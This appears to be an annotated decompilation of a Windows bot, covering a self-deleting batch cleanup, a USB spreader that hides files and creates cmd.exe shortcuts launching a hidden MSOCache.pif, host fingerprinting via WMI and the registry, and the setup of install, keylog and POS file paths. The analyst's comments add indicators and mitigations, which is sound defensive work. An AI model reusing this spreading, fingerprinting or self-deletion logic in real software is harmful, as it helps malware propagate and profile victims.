loc_4075FB: command = "ping -n 4 127.0.0.1 > nul" & vbCrLf | |
loc_4075FE: End If | |
loc_407603: If arg_14 Then | |
loc_40762D: command = command & "rd /q /s " & """" & "\\.\" & MY_DIR & """" | |
loc_40763E: Else | |
loc_40765E: command = command & "del /F " & """" & Me(88) & """" | |
loc_40766A: End If | |
loc_407676: If (Len(arg_C) > 1) Then | |
loc_407690: command = command & vbCrLf & "start " & arg_C | |
loc_40769A: End If | |
' Batch file deletes itself as its last step. | |
loc_4076D5: write_to_file(filename, command & vbCrLf & "del /F " & """" & filename & """", var_A0) | |
loc_4076DF: shell_execute(filename, var_A0) | |
loc_4076E6: End | |
loc_4076EA: Exit Sub | |
End Sub | |
Public Sub Proc_0_42_408E68 | |
' Removable-media spreader. | |
' For every ready drive with free space and drivetype = 1 (FileSystemObject: Removable): | |
'   1. copies the bot (Me(88)) to <drive>\MSOCache.pif and marks it hidden+system (6); | |
'   2. for each file whose extension is not "lnk": sets the file hidden+system and creates | |
'      "<name>.lnk" -> cmd.exe, minimised (windowstyle 7), arguments | |
'      "/c start MSOCache.pif&start <original file>&exit", icon taken from | |
'      HKLM\software\classes\.<ext>\<progid>\defaulticon (or the file itself); | |
'   3. does the same for each sub-folder ("explorer <folder>", "folder\defaulticon"). | |
' So the original items appear to open normally while the bot is launched alongside. | |
' The FSO / WScript.Shell objects and the registry reads are behind masked late-bound | |
' calls (LateMemCallLdVar / MemVar_402104). | |
' Indicators: hidden MSOCache.pif in the root of removable drives, .lnk files with | |
' target cmd.exe whose names mirror hidden siblings. Mitigations: show hidden/system files, | |
' block .pif/.lnk execution from removable media via application control. | |
'Data Table: 401634 | |
Dim var_C0 As Variant | |
Dim var_B0 As Variant | |
Dim var_F8 As Variant | |
Dim var_118 As Variant | |
Dim var_108 As Variant | |
Dim arg_2008 As Variant | |
Dim var_1A8 As String | |
Dim var_128 As Variant | |
Dim var_1B8 As String | |
loc_408800: On Error Resume Next | |
loc_40880F: CAdVar | |
loc_40881B: For Each var_98 In MemVar_402104.drives | |
' Only ready removable drives with free space. | |
loc_408862: If CBool(var_98.isready And (var_98.freespace > 0) And (var_98.drivetype = 1)) Then | |
loc_40888A: FileCopy Me(88), CStr(var_98.Path & "\" & "MSOCache.pif") | |
loc_4088CD: If get_attribute1(CStr(var_98.Path & "\" & "MSOCache.pif")) Then | |
loc_4088FA: SetAttr CStr(var_98.Path & "\" & "MSOCache.pif"), 6 | |
loc_40890B: End If | |
loc_40891A: var_C0 = var_98.Path & "\" | |
loc_408924: LateMemCallLdVar | |
loc_408932: CAdVar | |
' --- files in the drive root --- | |
loc_408946: For Each var_9C In MemVar_402104.Files | |
loc_408972: If CBool(InStr(1, var_9C.Name, ".", 0)) Then | |
loc_4089A8: arg_2008 = Split(CStr(var_9C.Name), ".", -1, 0) | |
loc_4089B2: var_90 = arg_2008 | |
loc_4089DD: If (LCase$(var_90(UBound(var_90, 1))) <> "lnk") Then | |
' Hide the original file (hidden + system). | |
loc_4089EB: var_9C.Attributes = 6 | |
loc_408A04: If CBool(var_9C.Name <> "MSOCache.pif") Then | |
loc_408A38: var_118 = var_98.Path & "\" & CVar(var_90(0)) & "." & "lnk" | |
loc_408A42: LateMemCallLdVar | |
loc_408A4A: CAdVar | |
loc_408A61: var_108 = "HKLM\software\classes\" | |
loc_408A8C: LateMemCallLdVar | |
' Default icon of the file type, so the shortcut looks like the original. | |
loc_408A9D: var_F8 = CVar("HKLM\software\classes\" & "." & var_90(UBound(var_90, 1)) & "\") & MemVar_402104 & "\defaulticon\" | |
loc_408AA7: LateMemCallLdVar | |
loc_408AB0: var_88 = CStr(MemVar_402104) | |
loc_408ACC: Set var_180 = MemVar_402104 | |
loc_408ADB: var_180.windowstyle = 7 | |
loc_408AEA: var_180.targetpath = "cmd.exe" | |
loc_408AFC: var_180.workingdirectory = CVar(0) | |
' Spaces in names are wrapped as "..." so cmd parses them as one token. | |
loc_408B89: var_1A8 = "/c " & "start " & Replace("MSOCache.pif", " ", """" & " " & """", 1, -1, 0) & "&" & "start " & Replace(CStr(var_9C.Name), " ", """" & " " & """", 1, -1, 0) | |
loc_408B97: var_180.arguments = CVar(var_1A8 & "&exit") | |
loc_408BD3: If CBool(InStr(1, var_88, ",", 0)) Then | |
loc_408BE2: var_180.iconlocation = CVar(var_88) | |
loc_408BE9: Else | |
loc_408BF7: var_180.iconlocation = var_9C.Path | |
loc_408BFE: End If | |
loc_408C03: Call var_180.save | |
loc_408C0D: Set var_180 = Nothing | |
loc_408C11: End If | |
loc_408C13: End If | |
loc_408C15: End If | |
loc_408C1C: Next | |
loc_408C31: var_C0 = var_98.Path & "\" | |
loc_408C3B: LateMemCallLdVar | |
loc_408C49: CAdVar | |
' --- sub-folders in the drive root --- | |
loc_408C5D: For Each var_A0 In MemVar_402104.subfolders | |
loc_408C6E: var_A0.Attributes = 6 | |
loc_408C9F: var_128 = var_98.Path & "\" & var_A0.Name & "." & "lnk" | |
loc_408CA9: LateMemCallLdVar | |
loc_408CB1: CAdVar | |
loc_408CD8: var_B0 = CVar("HKLM\software\classes\" & "folder" & "\defaulticon\") 'String | |
loc_408CE1: LateMemCallLdVar | |
loc_408CEA: var_8C = CStr(MemVar_402104) | |
loc_408CFC: Set var_1B4 = MemVar_402104 | |
loc_408D0B: var_1B4.windowstyle = 7 | |
loc_408D1A: var_1B4.targetpath = "cmd.exe" | |
loc_408D2C: var_1B4.workingdirectory = CVar(0) | |
loc_408DC0: var_1B8 = "/c " & "start " & Replace("MSOCache.pif", " ", """" & " " & """", 1, -1, 0) & "&" & "start " & "explorer " & Replace(CStr(var_A0.Name), " ", """" & " " & """", 1, -1, 0) | |
loc_408DCE: var_1B4.arguments = CVar(var_1B8 & "&exit") | |
loc_408E0C: If CBool(InStr(1, var_8C, ",", 0)) Then | |
loc_408E1B: var_1B4.iconlocation = CVar(var_8C) | |
loc_408E22: Else | |
loc_408E30: var_1B4.iconlocation = var_A0.Path | |
loc_408E37: End If | |
loc_408E3C: Call var_1B4.save | |
loc_408E46: Set var_1B4 = Nothing | |
loc_408E4F: Next | |
loc_408E55: End If | |
loc_408E5C: Next | |
loc_408E64: Exit Sub | |
End Sub | |
Public Sub fetch_av_products | |
' Returns the DisplayName of the first registered antivirus product (var_88). | |
' Reads HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion and, when it is | |
' greater than 6, queries root\SecurityCenter2 instead of root\SecurityCenter (the WMI | |
' namespace changed with Windows Vista). WMI query: "select * from AntivirusProduct". | |
' The loop exits after the first row, so additional products are ignored. | |
' Part of the victim fingerprint (see fingerprint_system). | |
'Data Table: 401634 | |
Dim var_A8 As Variant | |
Dim var_F8 As Variant | |
Dim var_D8 As Long | |
loc_404F94: On Error Resume Next | |
loc_404F9C: var_8C = "SecurityCenter" | |
loc_404FAF: var_A8 = CVar("HKLM" & "\Software\Microsoft\Windows NT\CurrentVersion\" & "CurrentVersion") 'String | |
loc_404FB8: LateMemCallLdVar | |
loc_404FD2: If (MemVar_402104 > 6) Then | |
loc_404FE2: var_8C = var_8C & CStr(2) | |
loc_404FE8: End If | |
loc_404FF1: var_F8 = CVar("select * from " & "AntivirusProduct") 'String | |
loc_405014: VarLateMemCallLdVar | |
loc_40501C: CAdVar | |
loc_40503A: For Each var_94 In GetObject(CVar("winmgmts:" & "\\.\root\" & var_8C), var_D8) | |
loc_405059: If (Len(var_94.DisplayName) > 0) Then | |
loc_405067: var_88 = CStr(var_94.DisplayName) | |
loc_40506D: End If | |
' Only the first product is reported. | |
loc_40506F: Exit For | |
loc_40507A: Next | |
loc_405082: Exit Sub | |
End Sub | |
Public Sub is_battery_present | |
' Returns "1" if the WMI query "select * from win32_Battery" yields any row, else "0". | |
' Used as a fingerprint field (laptop vs. desktop); such checks are also commonly used as | |
' a weak sandbox/VM heuristic - that use is inferred, not shown here. | |
'Data Table: 401634 | |
Dim var_F0 As Variant | |
loc_404440: On Error Resume Next | |
loc_404453: var_F0 = CVar("select * from " & "win32_" & "Battery") 'String | |
loc_404470: VarLateMemCallLdVar | |
loc_404478: CAdVar | |
loc_4044A3: If (GetObject("winmgmts:", var_D0).Count > 0) Then | |
loc_4044AB: var_88 = "1" | |
loc_4044B1: Else | |
loc_4044B6: var_88 = "0" | |
loc_4044B9: End If | |
loc_4044BB: Exit Sub | |
End Sub | |
Public Sub fetch_processor | |
' Returns the Name of the first win32_Processor instance (var_88), or leaves it unchanged | |
' when WMI returns nothing. The query string is assembled piecewise ("win32_" & "Process" | |
' & "or"), presumably to avoid a plain-text "win32_Processor" string in the binary. | |
'Data Table: 401634 | |
Dim var_F4 As Variant | |
Dim var_D4 As Long | |
loc_404AF8: On Error Resume Next | |
loc_404B0B: var_F4 = CVar("win32_" & "Process" & "or") 'String | |
loc_404B28: VarLateMemCallLdVar | |
loc_404B30: CAdVar | |
loc_404B32: Set var_8C = GetObject("winmgmts:", var_D4) | |
loc_404B5B: If (var_8C.Count > 0) Then | |
loc_404B66: For Each var_90 In var_8C | |
loc_404B85: If (Len(var_90.Name) > 0) Then | |
loc_404B93: var_88 = CStr(var_90.Name) | |
loc_404B99: End If | |
loc_404B9B: Exit For | |
loc_404BA6: Next | |
loc_404BAC: End If | |
loc_404BB0: Exit Sub | |
End Sub | |
Public Sub fetch_video_controller | |
' Returns the Caption of the first win32_VideoController instance whose VideoProcessor | |
' property is non-empty (var_88). Note the check is on VideoProcessor but the value | |
' reported is Caption. Fingerprint field; GPU strings are also a common VM indicator. | |
'Data Table: 401634 | |
Dim var_F0 As Variant | |
Dim var_D0 As Long | |
loc_4048E0: On Error Resume Next | |
loc_4048EC: var_F0 = CVar("win32_" & "VideoController") 'String | |
loc_404909: VarLateMemCallLdVar | |
loc_404911: CAdVar | |
loc_404913: Set var_8C = GetObject("winmgmts:", var_D0) | |
loc_404939: If (var_8C.Count > 0) Then | |
loc_404944: For Each var_90 In var_8C | |
loc_404963: If (Len(var_90.VideoProcessor) > 0) Then | |
loc_404971: var_88 = CStr(var_90.Caption) | |
loc_404977: End If | |
loc_404979: Exit For | |
loc_404984: Next | |
loc_40498A: End If | |
loc_40498E: Exit Sub | |
End Sub | |
Public Sub fetch_logical_disks | |
' Sets the global VOL_SERIAL (victim identifier used in upload names and the fingerprint). | |
' Takes VolumeSerialNumber of the first win32_LogicalDisk row; if that is empty, falls | |
' back to a persisted random 8-char hex id stored with VB SaveSetting under app name | |
' "L!NK", section "1", key "0" (i.e. HKCU\Software\VB and VBA Program Settings\L!NK\1\0), | |
' creating it when missing or not 8 characters long. Both branches Exit For, so only the | |
' first disk is ever examined. | |
' Host indicator: the "L!NK" branch under VB and VBA Program Settings (removed by C2 | |
' command 19 via DeleteSetting). | |
'Data Table: 401634 | |
Dim var_F0 As Variant | |
Dim var_A0 As Variant | |
Dim var_D0 As Long | |
loc_40523C: On Error Resume Next | |
loc_40524F: var_F0 = CVar("select * from " & "win32_" & "LogicalDisk") 'String | |
loc_40526C: VarLateMemCallLdVar | |
loc_405274: CAdVar | |
loc_405292: For Each obj In GetObject("winmgmts:", var_D0) | |
loc_4052A6: var_A0 = 0 | |
loc_4052B1: If (Len(obj.VolumeSerialNumber) > var_A0) Then | |
loc_4052BF: VOL_SERIAL = CStr(obj.VolumeSerialNumber) | |
loc_4052CA: Exit For | |
loc_4052D3: Else | |
' Fallback id: create once, then reuse. | |
loc_4052F6: If (Len(GetSetting("L!NK", "1", "0", var_A0)) <> 8) Then | |
loc_40530C: SaveSetting("L!NK", "1", "0", make_random_string(var_F0)) | |
loc_405314: End If | |
loc_405328: VOL_SERIAL = GetSetting("L!NK", "1", "0", var_A0) | |
loc_405330: Exit For | |
loc_405336: End If | |
loc_40533D: Next | |
loc_405345: Exit Sub | |
End Sub | |
Public Sub fetch_system | |
' Returns installed RAM in GiB as a formatted number string (var_88): | |
' win32_ComputerSystem.TotalPhysicalMemory / &H40000000 via FormatNumber, first row only. | |
' Fingerprint field (low memory is another common sandbox tell - inferred use). | |
'Data Table: 401634 | |
Dim var_F4 As Variant | |
Dim var_D4 As Variant | |
loc_404D30: On Error Resume Next | |
loc_404D43: var_F4 = CVar("select * from " & "win32_" & "ComputerSystem") 'String | |
loc_404D60: VarLateMemCallLdVar | |
loc_404D68: CAdVar | |
loc_404D86: For Each obj In GetObject("winmgmts:", var_D4) | |
loc_404DA5: If (Len(obj.TotalPhysicalMemory) > 0) Then | |
' &H40000000 = 1 GiB. | |
loc_404DDE: var_88 = FormatNumber((obj.TotalPhysicalMemory / &H40000000), -1, -2, -2, -2) | |
loc_404DEA: Exit For | |
loc_404DF0: End If | |
loc_404DF7: Next | |
loc_404DFF: Exit Sub | |
End Sub | |
Public Sub Proc_0_49_404F40(index) '404F40 | |
' Builds the remote file name for an upload: VOL_SERIAL & "." & <letter>, where the letter | |
' is chosen by index from the table a b c d e i f g h (note "i" sits at index 5, before | |
' f g h). Used by Proc_0_30_4060D8 (index 0..5) and Proc_0_29_4059BC (index 6 -> "f"). | |
' Network indicator: uploaded filename "<8-char volume serial>.<single letter>". | |
'Data Table: 401634 | |
loc_404E5C: On Error Resume Next | |
loc_404E81: ReDim _arr(0 To 8) | |
loc_404E98: _arr(0) = 97 'a | |
loc_404EA6: _arr(1) = 98 'b | |
loc_404EB4: _arr(2) = 99 'c | |
loc_404EC2: _arr(3) = 100 'd | |
loc_404ED0: _arr(4) = 101 'e | |
loc_404EDE: _arr(5) = 105 'i | |
loc_404EEC: _arr(6) = 102 'f | |
loc_404EFA: _arr(7) = 103 'g | |
loc_404F08: _arr(8) = 104 'h | |
loc_404F2C: var_88 = VOL_SERIAL & "." & ChrW$(CLng(Array(_arr)(index))) | |
loc_404F3F: Exit Sub | |
End Sub | |
Public Sub make_random_string | |
' Returns an 8-character string drawn from "ABCDEF0123456789" using VB Rnd (var_88). | |
' Used for multipart boundaries, dropped-file names in TEMP_DIR and the fallback volume id. | |
' The decompiler dropped the parameter list (callers pass a directory prefix etc.) and | |
' var_AC, used to seed Randomize, is not initialised in this view. Rnd is not a | |
' cryptographic generator - the names are predictable given the seed, which can help when | |
' correlating artifacts but offers no security to anyone. | |
'Data Table: 401634 | |
loc_4042D8: On Error Resume Next | |
loc_4042E0: Randomize(var_AC) | |
loc_4042F7: For var_B4 = 1 To 8: var_8C = var_B4 'Long | |
' Int(Rnd * 16) + 1 selects a 1-based position in the 16-character alphabet. | |
loc_40432C: var_88 = var_88 & Mid$("ABCDEF0123456789", CLng(Int(((Rnd(var_AC) * CDbl(&H10)) + CDbl(1)))), 1) | |
loc_40433E: Next var_B4 'Long | |
loc_404345: Exit Sub | |
End Sub | |
Public Sub fingerprint_system(arg_C) '407E60
'Data Table: 401634
'Assembles the host-fingerprint record the sample reports and stores it as
'"<key>=<encoded record>" in Me(12). Me(n) is how the decompiler shows the object's own
'fields; Me(124) is presumably a configuration string. If arg_C is non-empty the
'record is just arg_C behind 14 empty fields; otherwise it is built from environment
'variables, the registry, WMI helpers and the volume serial, separated by "|".
Dim var_B4 As Variant
Dim var_174 As String
Dim var_1B0 As String
'All errors are swallowed; a failing helper leaves an empty field, not an error.
loc_407B30: On Error Resume Next
'Key name: first, last and 16th character of the config string Me(124), lowercased.
loc_407B7D: var_88 = LCase$(Left$(Me(124), 1) & Right$(Me(124), 1) & Mid$(Me(124), &H10, 1))
loc_407B9C: If (Len(arg_C) <> 0) Then
'&HE = 14 "|" characters. The full record below also ends up with 14 "|"-terminated
'fields (assuming each helper appends exactly one field), so arg_C occupies a 15th slot.
loc_407BBD: var_8C = String$(&HE, "|") & arg_C
loc_407BC9: Else
'Names are split into fragments ("COMPUTER" & "Name") to hinder static string matching;
'Environ$ on Windows is case-insensitive so the mixed case does not matter.
loc_407BDC: var_C4 = Environ$(CVar("COMPUTER" & "Name"))
loc_407BF3: var_C8 = Environ$(CVar("USER" & "Name"))
loc_407DC: var_DC = Environ$(CVar("USER" & "DOMAIN"))
'OS name from HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProductName. The read
'itself is a late-bound call the decompiler did not reconstruct (LateMemCallLdVar);
'presumably a RegRead on the WScript.Shell object created in init_globals — unverified.
loc_407C27: var_B4 = CVar("HKLM" & "\Software\Microsoft\Windows NT\CurrentVersion\" & "Product" & "Name") 'String
loc_407C30: LateMemCallLdVar
loc_407C39: var_CC = CStr(MemVar_402104)
'Drive size in GiB (&H40000000 = 2^30) of some drive object with a TotalSize property.
'Decompiler artifact: Environ$("HOMEDRIVE") appears as FormatNumber's second argument;
'it was most likely the argument of the drive lookup hidden in the pseudo-op above.
loc_407C79: LateMemCallLdVar
loc_407C9F: var_D0 = FormatNumber((MemVar_402104.TotalSize / &H40000000), CVar(Environ$("HOMEDRIVE")), -1, -2, -2)
'"PROCESSOR_ARCHITEW6432" is only defined for a 32-bit process running under WOW64 on
'64-bit Windows. So var_D4 = "1" means no WOW64 (for a 32-bit VB6 binary: 32-bit OS),
'"0" means 64-bit Windows.
loc_407CC4: var_B4 = CVar("Process" & "OR_ARCHITEW" & CStr(6432)) 'String
loc_407CE2: If (Len(Environ$(var_B4)) = 0) Then
loc_407CEA: var_D4 = "1"
loc_407CF0: Else
loc_407CF5: var_D4 = "0"
loc_407CF8: End If
'Decompiler artifact: an API declared under the name CopyMemory is called with one
'argument dropped and its result used as a boolean. What var_D8 actually flags cannot
'be determined from this listing; the Declare alias should be checked in the binary.
loc_407CFF: If CopyMemory(-2, var_B4, ) Then
loc_407D07: var_D8 = "1"
loc_407D0D: Else
loc_407D12: var_D8 = "0"
loc_407D15: End If
'Field order: computer name | AV products | OS ProductName | volume serial | "L!NK" |
'user name | RAM GiB | CPU | video controller | drive GiB | WOW64 flag | var_D8 flag |
'battery | user domain |. The helpers are called as functions and presumably append
'their own field to the string they receive (their parameter lists are not
'reconstructed). "L!NK" is the same literal used as the SaveSetting app name for the
'fallback volume serial, so it serves as a fixed marker in the record.
loc_407D7E: var_174 = fetch_system(fetch_av_products(var_C4 & "|") & "|" & var_CC & "|" & VOL_SERIAL & "|" & "L!NK" & "|" & var_C8 & "|") & "|"
loc_407DE1: var_1B0 = is_battery_present(fetch_video_controller(fetch_processor(var_174) & "|") & "|" & var_D0 & "|" & var_D4 & "|" & var_D8 & "|") & "|"
loc_407DEF: var_8C = var_1B0 & var_DC & "|"
loc_407E33: End If
'Proc_0_18_405D30 transforms the record before storage (an encoding or encryption step
'is the obvious guess; not visible here).
loc_407E4D: Me(12) = var_88 & "=" & Proc_0_18_405D30(var_8C)
loc_407E5C: Exit Sub
End Sub
Public Sub get_object_type(type) '404408
'Data Table: 401634
'Maps a small integer selector to the ProgID of a COM object the sample instantiates
'via CreateObject (init_globals uses selectors 0, 1 and 2). The ProgID is left in
'var_88, the decompiler's return slot; an unknown selector leaves var_88 untouched.
'Most ProgIDs are assembled from two fragments so the full name never appears as a
'single literal in the binary.
Dim _type As Long
_type = type
Select Case _type
    Case 0
        var_88 = "WScript." & "Shell"            'shell: run commands, registry, special folders
    Case 1
        var_88 = "Scripting.FileSystemObject"     'file and drive operations
    Case 2
        var_88 = "MSXML2." & "ServerXMLHTTP"      'HTTP client (WinHTTP-based, not the user's IE proxy/cache)
    Case 3
        var_88 = "Shell" & ".Application"         'ShellExecute-style launching
    Case 4
        var_88 = "MSXML2." & "DOMDocument"        'XML parsing
End Select
Exit Sub
End Sub
Public Sub init_globals
'Data Table: 401634
'One-time setup of the module's globals: the three COM helpers and every path the
'sample later reads, writes or installs to. The literals here are the most useful
'host indicators in this listing (install path, log/keys/command files, dropped
'executables). Unlike the other routines, there is no On Error Resume Next, so a
'failing CreateObject propagates to the caller.
Dim var_B0 As Variant
'COM objects, by ProgID from get_object_type: 0 = WScript.Shell,
'1 = Scripting.FileSystemObject, 2 = MSXML2.ServerXMLHTTP. CAdVar is a decompiler
'pseudo-op; the second CreateObject argument is an artifact of the same reconstruction.
loc_406B60: CAdVar
loc_406B62: WSCRIPT_OBJ = CreateObject(get_object_type(0), 0)
loc_406B8E: CAdVar
loc_406B90: SCRIPTINGFSO_OBJ = CreateObject(get_object_type(1), 0)
loc_406BBC: CAdVar
loc_406BBE: MSXML_OBJ = CreateObject(get_object_type(2), 0)
'Directory globals all carry a trailing backslash.
loc_406BE1: TEMP_DIR = Environ$("TEMP") & "\"
loc_406C04: APPDATA_DIR = Environ$("APPDATA") & "\"
loc_406C27: WINDIR = Environ$("WINDIR") & "\"
loc_406C3F: var_B4 = Me.Global.App
'Directory the running executable was started from.
loc_406C53: MY_DIR = App.Path & "\"
'Me(40) receives "<folder>\" from a late-bound call with the argument "Startup";
'presumably WScript.Shell.SpecialFolders("Startup"), i.e. the user's Startup folder
'for persistence — the call itself is hidden in the pseudo-op.
loc_406C5F: var_B0 = "Startup"
loc_406C6A: LateMemCallLdVar
loc_406C7C: Me(40) = CStr(MemVar_402104 & "\")
loc_406C99: SYSTEM32_DIR = WINDIR & "system32" & "\"
'Path of the hosts file; nothing in this block touches it, but keeping a global for it
'suggests DNS-override capability elsewhere in the sample.
loc_406CAB: HOSTS_PATH = SYSTEM32_DIR & "drivers\etc\hosts"
'Install base: an environment variable whose name comes from config field Me(136).
'Proc_0_14_403F14(path, 0) appears to be a validity/existence check (not visible here);
'if it fails, %TEMP% is used instead.
loc_406CC7: var_88 = Environ$(Me(136)) & "\"
loc_406CDB: If Not(Proc_0_14_403F14(var_88, 0)) Then
loc_406CE3: Me(52) = TEMP_DIR
loc_406CEB: Else
loc_406CEE: Me(52) = var_88
loc_406CF3: End If
'Full install path: <base>\<config subdir Me(144)>\<MY_APPNAME>.exe. MY_APPNAME is
'read as a bare name and overwritten with the full path.
loc_406D15: MY_APPNAME = Me(52) & Me(144) & "\" & MY_APPNAME & ".exe"
'Working files next to the executable; names are split ("log" & ".c") to break
'static string matching. Resulting names: log.c, dwn.exe, keys.c, Off.c, win.c.
loc_406D34: LOGNAME = MY_DIR & "log" & ".c"
loc_406D46: DWN_EXE = MY_DIR & "dwn.exe"
loc_406D53: POS_EXE = "POS" & ".exe"
loc_406D69: KEYS_C = MY_DIR & "keys" & ".c"
'Files under %APPDATA%: POS.exe and output.txt.
loc_406D7D: POS_PATH = APPDATA_DIR & POS_EXE
loc_406D8C: OUTPUT_TXT = APPDATA_DIR & "output.txt"
loc_406DA2: OFF_C = MY_DIR & "Off" & ".c"
loc_406DBB: WIN_C = MY_DIR & "win" & ".c"
loc_406DC4: Exit Sub
End Sub